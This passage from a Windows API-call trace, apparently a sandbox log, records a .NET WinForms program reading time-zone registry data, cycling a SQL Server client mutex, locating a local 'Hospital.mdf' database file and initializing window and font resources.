SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.466] CreateMutexW (lpMutexAttributes=0x22c46e8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.466] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.468] GetTimeZoneInformation (in: lpTimeZoneInformation=0x52d634 | out: lpTimeZoneInformation=0x52d634) returned 0x2 [0178.470] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x52d488 | out: pTimeZoneInformation=0x52d488) returned 0x2 [0178.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d56c | out: phkResult=0x52d56c*=0x2cc) returned 0x0 [0178.472] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x52d588, lpData=0x0, lpcbData=0x52d584*=0x0 | out: lpType=0x52d588*=0x3, lpData=0x0, lpcbData=0x52d584*=0x2c) returned 0x0 [0178.472] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x52d588, lpData=0x22c51dc, lpcbData=0x52d584*=0x2c | out: lpType=0x52d588*=0x3, lpData=0x22c51dc*, lpcbData=0x52d584*=0x2c) returned 0x0 [0178.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d3c0 | out: phkResult=0x52d3c0*=0x2d0) returned 0x0 [0178.472] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x52d3dc, lpData=0x0, lpcbData=0x52d3d8*=0x0 | out: lpType=0x52d3dc*=0x4, lpData=0x0, lpcbData=0x52d3d8*=0x4) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x52d3dc, lpData=0x52d3c8, lpcbData=0x52d3d8*=0x4 | out: lpType=0x52d3dc*=0x4, lpData=0x52d3c8*=0x7d7, lpcbData=0x52d3d8*=0x4) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x52d3dc, lpData=0x0, lpcbData=0x52d3d8*=0x0 | out: lpType=0x52d3dc*=0x4, lpData=0x0, lpcbData=0x52d3d8*=0x4) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x52d3dc, lpData=0x52d3c8, lpcbData=0x52d3d8*=0x4 | out: lpType=0x52d3dc*=0x4, lpData=0x52d3c8*=0x7d8, lpcbData=0x52d3d8*=0x4) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x52d3dc, lpData=0x0, lpcbData=0x52d3d8*=0x0 | out: lpType=0x52d3dc*=0x3, lpData=0x0, lpcbData=0x52d3d8*=0x2c) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x52d3dc, lpData=0x22c5740, lpcbData=0x52d3d8*=0x2c | out: lpType=0x52d3dc*=0x3, lpData=0x22c5740*, lpcbData=0x52d3d8*=0x2c) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x52d3dc, lpData=0x0, lpcbData=0x52d3d8*=0x0 | out: lpType=0x52d3dc*=0x3, lpData=0x0, lpcbData=0x52d3d8*=0x2c) returned 0x0 [0178.473] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x52d3dc, lpData=0x22c5800, lpcbData=0x52d3d8*=0x2c | out: lpType=0x52d3dc*=0x3, lpData=0x22c5800*, lpcbData=0x52d3d8*=0x2c) returned 0x0 [0178.473] RegCloseKey (hKey=0x2d0) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x52d560, lpData=0x0, lpcbData=0x52d55c*=0x0 | out: lpType=0x52d560*=0x1, lpData=0x0, lpcbData=0x52d55c*=0x20) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x52d560, lpData=0x22c5948, lpcbData=0x52d55c*=0x20 | out: lpType=0x52d560*=0x1, lpData="@tzres.dll,-670", lpcbData=0x52d55c*=0x20) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x52d560, lpData=0x0, lpcbData=0x52d55c*=0x0 | out: lpType=0x52d560*=0x1, lpData=0x0, lpcbData=0x52d55c*=0x20) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x52d560, lpData=0x22c59a0, lpcbData=0x52d55c*=0x20 | out: lpType=0x52d560*=0x1, lpData="@tzres.dll,-672", lpcbData=0x52d55c*=0x20) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x52d560, lpData=0x0, lpcbData=0x52d55c*=0x0 | out: lpType=0x52d560*=0x1, lpData=0x0, lpcbData=0x52d55c*=0x20) returned 0x0 [0178.474] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x52d560, lpData=0x22c59f8, lpcbData=0x52d55c*=0x20 | out: lpType=0x52d560*=0x1, lpData="@tzres.dll,-671", lpcbData=0x52d55c*=0x20) returned 0x0 [0178.475] CoTaskMemAlloc (cb=0x20c) returned 0x3b3ad8 [0178.475] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x3b3ad8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0178.476] CoTaskMemFree (pv=0x3b3ad8) [0178.476] CoTaskMemAlloc (cb=0x20c) returned 0x3b3ad8 [0178.477] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath=0x3b3ad8, pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574 | out: pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574) returned 1 [0178.478] CoTaskMemFree (pv=0x0) [0178.478] CoTaskMemFree (pv=0x3b3ad8) [0178.479] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x680001 [0178.481] CoTaskMemAlloc (cb=0x3ec) returned 0x3b5f08 [0178.481] LoadStringW (in: hInstance=0x680001, uID=0x29e, lpBuffer=0x3b5f08, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0178.481] CoTaskMemFree (pv=0x3b5f08) [0178.481] FreeLibrary (hLibModule=0x680001) returned 1 [0178.482] CoTaskMemAlloc (cb=0x20c) returned 0x3b3cc0 [0178.482] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x3b3cc0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0178.482] CoTaskMemFree (pv=0x3b3cc0) [0178.482] CoTaskMemAlloc (cb=0x20c) returned 0x3b3cc0 [0178.482] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath=0x3b3cc0, pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574 | out: pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574) returned 1 [0178.483] CoTaskMemFree (pv=0x0) [0178.483] CoTaskMemFree (pv=0x3b3cc0) [0178.483] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x680001 [0178.484] CoTaskMemAlloc (cb=0x3ec) returned 0x3b5f08 [0178.484] LoadStringW (in: hInstance=0x680001, uID=0x2a0, lpBuffer=0x3b5f08, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0178.484] CoTaskMemFree (pv=0x3b5f08) [0178.484] FreeLibrary (hLibModule=0x680001) returned 1 [0178.485] CoTaskMemAlloc (cb=0x20c) returned 0x3b3cc0 [0178.485] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x3b3cc0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0178.485] CoTaskMemFree (pv=0x3b3cc0) [0178.485] CoTaskMemAlloc (cb=0x20c) returned 0x3b3cc0 [0178.485] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath=0x3b3cc0, pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574 | out: pwszLanguage=0x0, pcchLanguage=0x52d57c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x52d580, pululEnumerator=0x52d574) returned 1 [0178.486] CoTaskMemFree (pv=0x0) [0178.486] CoTaskMemFree (pv=0x3b3cc0) [0178.486] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x680001 [0178.487] CoTaskMemAlloc (cb=0x3ec) returned 0x3b5f08 [0178.487] LoadStringW (in: hInstance=0x680001, uID=0x29f, lpBuffer=0x3b5f08, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0178.487] CoTaskMemFree (pv=0x3b5f08) [0178.487] FreeLibrary (hLibModule=0x680001) returned 1 [0178.488] RegCloseKey (hKey=0x2cc) returned 0x0 [0178.489] GetCurrentProcessId () returned 0x718 [0178.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x718) returned 0x2cc [0178.491] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x52d7c8, lpExitTime=0x52d7c0, lpKernelTime=0x52d7c0, lpUserTime=0x52d7c0 | out: lpCreationTime=0x52d7c8, lpExitTime=0x52d7c0, lpKernelTime=0x52d7c0, lpUserTime=0x52d7c0) returned 1 [0178.491] CloseHandle (hObject=0x2cc) returned 1 [0178.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x678) returned 0x2cc [0178.492] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x52d80c, lpExitTime=0x52d804, lpKernelTime=0x52d804, lpUserTime=0x52d804 | out: lpCreationTime=0x52d80c, lpExitTime=0x52d804, lpKernelTime=0x52d804, lpUserTime=0x52d804) returned 1 [0178.492] CloseHandle (hObject=0x2cc) returned 1 [0178.492] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x678) returned 0x2cc [0178.492] GetCurrentProcess () returned 0xffffffff [0178.492] GetCurrentProcess () returned 0xffffffff [0178.493] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x52d78c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x52d78c*=0x2d8) returned 1 [0178.493] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x52d784*=0x2d8, lpdwindex=0x52d5a4 | out: lpdwindex=0x52d5a4) returned 0x80010115 [0178.525] CloseHandle (hObject=0x2d8) returned 1 [0178.525] CloseHandle (hObject=0x2cc) returned 1 [0178.526] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.526] CloseHandle (hObject=0x2c4) returned 1 [0178.526] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22c9774, cbSid=0x52d848 | out: pSid=0x22c9774*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.526] CreateMutexW (lpMutexAttributes=0x22c9850, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.526] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.527] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.527] CloseHandle (hObject=0x2c4) returned 1 [0178.527] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22c9f98, cbSid=0x52d848 | out: pSid=0x22c9f98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.527] CreateMutexW (lpMutexAttributes=0x22ca074, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.527] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.528] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.528] CloseHandle (hObject=0x2c4) returned 1 [0178.528] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22ca7b4, cbSid=0x52d848 | out: pSid=0x22ca7b4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.528] CreateMutexW (lpMutexAttributes=0x22ca890, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.528] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.528] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.529] CloseHandle (hObject=0x2c4) returned 1 [0178.529] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cafe4, cbSid=0x52d848 | out: pSid=0x22cafe4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.529] CreateMutexW (lpMutexAttributes=0x22cb0c0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.529] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.529] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.529] CloseHandle (hObject=0x2c4) returned 1 [0178.530] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cb818, cbSid=0x52d848 | out: pSid=0x22cb818*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.530] CreateMutexW (lpMutexAttributes=0x22cb8f4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.530] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.530] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.530] CloseHandle (hObject=0x2c4) returned 1 [0178.531] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cc03c, cbSid=0x52d848 | out: pSid=0x22cc03c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.531] CreateMutexW (lpMutexAttributes=0x22cc118, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.531] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.531] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.531] CloseHandle (hObject=0x2c4) returned 1 [0178.532] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cc864, cbSid=0x52d848 | out: pSid=0x22cc864*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.532] CreateMutexW (lpMutexAttributes=0x22cc940, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.532] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.532] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.532] CloseHandle (hObject=0x2c4) returned 1 [0178.533] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cd080, cbSid=0x52d848 | out: pSid=0x22cd080*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.533] CreateMutexW (lpMutexAttributes=0x22cd15c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.533] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.533] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.533] CloseHandle (hObject=0x2c4) returned 1 [0178.534] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22cd8a4, cbSid=0x52d848 | out: pSid=0x22cd8a4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52d848) returned 1 [0178.534] CreateMutexW (lpMutexAttributes=0x22cd980, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0178.534] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0178.534] ReleaseMutex (hMutex=0x2c4) returned 1 [0178.534] CloseHandle (hObject=0x2c4) returned 1 [0178.548] GetCurrentProcess () returned 0xffffffff [0178.548] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52d544 | out: TokenHandle=0x52d544*=0x2c4) returned 1 [0178.559] GetCurrentProcess () returned 0xffffffff [0178.559] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52d554 | out: TokenHandle=0x52d554*=0x2cc) returned 1 [0178.569] EtwEventRegister () returned 0x0 [0178.587] GetModuleHandleW (lpModuleName=0x0) returned 0xe0000 [0178.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="_______SQL______Process______Available@0", cchWideChar=40, lpMultiByteStr=0x52e59c, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x52e558 | out: lpMultiByteStr="_______SQL______Process______Available@0,S)o\x8e­p\x0b\x94Â5t´çR", lpUsedDefaultChar=0x52e558) returned 40 [0178.587] GetProcAddress (hModule=0xe0000, lpProcName="_______SQL______Process______Available@0") returned 0x0 [0178.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="______SQL______Process______Available", cchWideChar=37, lpMultiByteStr=0x52e5a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x52e55c | out: lpMultiByteStr="______SQL______Process______AvailableS)o\x8e­p\x0b\x94Â5t´çR", lpUsedDefaultChar=0x52e55c) returned 37 [0178.588] GetProcAddress (hModule=0xe0000, lpProcName="______SQL______Process______Available") returned 0x0 [0178.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ec88 | out: phkResult=0x52ec88*=0x0) returned 0x2 [0178.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", nBufferLength=0x105, lpBuffer=0x52e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpFilePart=0x0) returned 0x2e [0178.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Hospital.mdf", nBufferLength=0x105, lpBuffer=0x52e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Hospital.mdf", lpFilePart=0x0) returned 0x3a [0178.596] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ec68 | out: phkResult=0x52ec68*=0x0) returned 0x2 [0178.627] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ec04 | out: phkResult=0x52ec04*=0x0) returned 0x2 [0178.652] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0178.654] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73390000 [0178.660] AdjustWindowRectEx (in: lpRect=0x52ef80, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x52ef80) returned 1 [0178.662] GetCurrentProcess () returned 0xffffffff [0178.662] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x52ee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x52ee98*=0x328) returned 1 [0178.673] GetCurrentActCtx (in: lphActCtx=0x52edf8 | out: lphActCtx=0x52edf8*=0x0) returned 1 [0178.673] ActivateActCtx (in: hActCtx=0x3837fc, lpCookie=0x52ee08 | out: hActCtx=0x3837fc, lpCookie=0x52ee08) returned 1 [0178.674] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0178.676] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72ee0000 [0178.681] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75b00000 [0178.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x52ecc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\"p\x8e­p\x0b\x94Â5t\x80ñR", lpUsedDefaultChar=0x0) returned 14 [0178.681] GetProcAddress (hModule=0x75b00000, lpProcName="DefWindowProcW") returned 0x76fd25dd [0178.682] GetStockObject (i=5) returned 0x1900015 [0178.684] GetModuleHandleW (lpModuleName=0x0) returned 0xe0000 [0178.685] CoTaskMemAlloc (cb=0x5a) returned 0x3846a8 [0178.685] RegisterClassW (lpWndClass=0x52ecb0) returned 0xc120 [0178.686] CoTaskMemFree (pv=0x3846a8) [0178.686] GetModuleHandleW (lpModuleName=0x0) returned 0xe0000 [0178.686] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xe0000, lpParam=0x0) returned 0x3014e [0178.687] SetWindowLongW (hWnd=0x3014e, nIndex=-4, dwNewLong=1996301789) returned 7145622 [0178.688] GetWindowLongW (hWnd=0x3014e, nIndex=-4) returned 1996301789 [0178.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e5c0 | out: phkResult=0x52e5c0*=0x33c) returned 0x0 [0178.689] RegQueryValueExW (in: hKey=0x33c, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x52e5e0, lpData=0x0, lpcbData=0x52e5dc*=0x0 | out: lpType=0x52e5e0*=0x0, lpData=0x0, lpcbData=0x52e5dc*=0x0) returned 0x2 [0178.689] RegQueryValueExW (in: hKey=0x33c, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x52e5e0, lpData=0x0, lpcbData=0x52e5dc*=0x0 | out: lpType=0x52e5e0*=0x0, lpData=0x0, lpcbData=0x52e5dc*=0x0) returned 0x2 [0178.689] RegCloseKey (hKey=0x33c) returned 0x0 [0178.690] SetWindowLongW (hWnd=0x3014e, nIndex=-4, dwNewLong=7145662) returned 1996301789 [0178.690] GetWindowLongW (hWnd=0x3014e, nIndex=-4) returned 7145662 [0178.690] GetWindowLongW (hWnd=0x3014e, nIndex=-16) returned 113311744 [0178.691] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc121 [0178.691] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc122 [0178.691] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x3014e, Msg=0x81, wParam=0x0, lParam=0x52e88c) returned 0x1 [0178.691] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x3014e, Msg=0x83, wParam=0x0, lParam=0x52e878) returned 0x0 [0178.692] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x3014e, Msg=0x1, wParam=0x0, lParam=0x52e88c) returned 0x0 [0178.692] GetClientRect (in: hWnd=0x3014e, lpRect=0x52e5f4 | out: lpRect=0x52e5f4) returned 1 [0178.692] GetWindowRect (in: hWnd=0x3014e, lpRect=0x52e5f4 | out: lpRect=0x52e5f4) returned 1 [0178.693] GetParent (hWnd=0x3014e) returned 0x0 [0178.693] DeactivateActCtx (dwFlags=0x0, ulCookie=0x128f0001) returned 1 [0178.849] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.849] AdjustWindowRectEx (in: lpRect=0x52eddc, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x52eddc) returned 1 [0178.852] GetSystemDefaultLCID () returned 0x409 [0178.853] GetStockObject (i=17) returned 0x18a0025 [0178.855] GetObjectW (in: h=0x18a0025, c=92, pv=0x52eb98 | out: pv=0x52eb98) returned 92 [0178.856] GetDC (hWnd=0x0) returned 0x50106d6 [0178.866] GdiplusStartup (in: token=0x266030, input=0x52e168, output=0x52e1b8 | out: token=0x266030, output=0x52e1b8) returned 0x0 [0178.873] CoTaskMemAlloc (cb=0x5c) returned 0x384710 [0178.873] GdipCreateFontFromLogfontW (hdc=0x50106d6, logfont=0x384710, font=0x52ec60) returned 0x0 [0178.977] CoTaskMemFree (pv=0x384710) [0178.978] CoTaskMemAlloc (cb=0x5c) returned 0x384710 [0178.978] CoTaskMemFree (pv=0x384710) [0178.979] CoTaskMemAlloc (cb=0x5c) returned 0x384710 [0178.979] CoTaskMemFree (pv=0x384710) [0178.979] GdipGetFontUnit (font=0x5902230, unit=0x52ec2c) returned 0x0 [0178.979] GdipGetFontSize (font=0x5902230, size=0x52ec30) returned 0x0 [0178.980] GdipGetFontStyle (font=0x5902230, style=0x52ec28) returned 0x0 [0178.980] GdipGetFamily (font=0x5902230, family=0x52ec24) returned 0x0 [0178.980] GdipGetFontSize (font=0x5902230, size=0x22d80d8) returned 0x0 [0178.981] ReleaseDC (hWnd=0x0, hDC=0x50106d6) returned 1 [0178.981] GetDC (hWnd=0x0) returned 0x50106d6 [0178.981] GdipCreateFromHDC (hdc=0x50106d6, graphics=0x52ec4c) returned 0x0 [0178.983] GdipGetDpiY (graphics=0x540fcf0, dpi=0x22d81e0) returned 0x0 [0178.983] GdipGetFontHeight (font=0x5902230, graphics=0x540fcf0, height=0x52ec44) returned 0x0 [0178.983] GdipGetEmHeight (family=0x590f6b8, style=0, EmHeight=0x52ec4c) returned 0x0 [0178.983] GdipGetLineSpacing (family=0x590f6b8, style=0, LineSpacing=0x52ec4c) returned 0x0 [0178.984] GdipDeleteGraphics (graphics=0x540fcf0) returned 0x0 [0178.984] ReleaseDC (hWnd=0x0, hDC=0x50106d6) returned 1 [0178.984] GdipCreateFont (fontFamily=0x590f6b8, emSize=0x41040000, style=0, unit=0x3, font=0x22d81a0) returned 0x0 [0178.984] GdipGetFontSize (font=0x5462940, size=0x22d81a4) returned 0x0 [0178.984] GdipDeleteFont (font=0x5902230) returned 0x0 [0178.985] GetDC (hWnd=0x0) returned 0x50106d6 [0178.985] GdipCreateFromHDC (hdc=0x50106d6, graphics=0x52ecb0) returned 0x0 [0178.985] GdipGetFontHeight (font=0x5462940, graphics=0x540fcf0, height=0x52eca8) returned 0x0 [0178.985] GdipDeleteGraphics (graphics=0x540fcf0) returned 0x0 [0178.985] ReleaseDC (hWnd=0x0, hDC=0x50106d6) returned 1 [0178.985] GetSystemMetrics (nIndex=5) returned 1 [0178.985] 